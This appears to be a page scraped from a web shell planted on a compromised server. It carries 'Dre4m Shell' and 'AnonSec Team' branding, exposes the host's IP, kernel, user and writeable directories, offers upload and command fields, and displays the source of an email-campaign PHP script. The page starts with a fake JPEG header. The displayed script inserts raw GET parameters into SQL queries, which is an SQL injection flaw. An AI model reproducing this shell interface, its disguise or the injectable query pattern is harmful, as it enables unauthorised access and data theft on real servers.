ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.110
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/litsolide.com/seo-mailing/tasks/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/litsolide.com/seo-mailing/tasks/online.php
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title><?php echo  $_SET['titlefrom']?></title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Seo-Mailing">
    <meta name="author" content="seomedias.com">
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="assets/ico/fsm-144.png">
    <link rel="apple-touch-icon-precomposed" sizes="114x114" href="assets/ico/fsm-96.png">
   	<link rel="apple-touch-icon-precomposed" sizes="72x72" href="assets/ico/fsm-72.png">
    <link rel="apple-touch-icon-precomposed" href="assets/ico/fsm-48.png">
   	<link rel="shortcut icon" href="assets/ico/fsm-48.png">
    <style>
		body { margin:0px; padding:0px}
	</style>
  </head>

<?php
///////////////////////////////////////////////
// Ecrit dans table ONLINE

		$query = "SELECT id, id_template  FROM ".$INFO['sql_tbl_prefix']."mail_task WHERE sha1(id) = '".$_GET['online']."' LIMIT 1";
		$result = mysqli_query($db,$query) or exit("select advice error");
		$idd_task = mysqli_fetch_array($result);
		
		$query = "SELECT id FROM ".$INFO['sql_tbl_prefix']."mail_user WHERE sha1(id) = '".$_GET['u']."' LIMIT 1";
		$result = mysqli_query($db,$query) or exit("select advice error");
		$idd_user = mysqli_fetch_array($result);

$idd_mailing = $idd_task['id'];
$idd_template = $idd_task['id_template'];
$idd_client = $idd_user['id'];

	$query = "INSERT INTO ".$INFO['sql_tbl_prefix']."statistic_open (id, id_task, id_user) VALUES ('', '".$idd_mailing."','".$idd_client."')"; 
	mysqli_query($db,$query) or exit("insert error" . mysqli_error()."<br>".$query);	
	
///////////////////////////////////////////////

$task = mysqli_fetch_array(mysqli_query($db,"SELECT message FROM ".$INFO['sql_tbl_prefix']."mail_task WHERE sha1(id) = '".$_GET['online']."' LIMIT 1"));
$user = mysqli_fetch_array(mysqli_query($db,"SELECT * FROM ".$INFO['sql_tbl_prefix']."mail_user WHERE sha1(id) = '".$_GET['u']."' LIMIT 1"));

$body = $task['message'];
$body = str_replace('{name}', $user['name'], $body);
$body = str_replace("{unsubscribe}", "<a href='".$INFO['base_url']."?decline=".$user['unsubscribe_code']."' target='_blank' style='text-decoration: none; font-size: 8pt; color: black;'>".__('Unsubscribe')."</a>", $body);
$online_task = sha1($task['id']);
$online_user = sha1($user['id']);
//$body = str_replace('{online}', "<a href='".$INFO['base_url']."?online=".$online_task."&u=".$online_user."' target='_blank'>".__('View online here')."</a>", $body);
$body = str_replace('{online}', "", $body);
$result_sh = mysqli_query($db,"SELECT * FROM ".$INFO['sql_tbl_prefix']."shortcodes WHERE system = 0");
if(mysqli_num_rows($result_sh)>0){
	while($sh = mysqli_fetch_array($result_sh)){
		$body = str_replace("{".$sh['shortcode']."}", $sh['value'], $body);
	}
}
 
echo'<body style="background-image: url(./uploadfiles/'.$idd_template.'.jpg);
background-position: center top;
background-repeat: no-repeat; background-size: cover;-webkit-background-size: cover;-webkit-background-size: cover; -moz-background-size: cover; -o-background-size: cover;
background-attachment: fixed;">' .$body. '<br /><br /><br /><br /></body></html>';
?>

Anon7 - 2022
AnonSec Team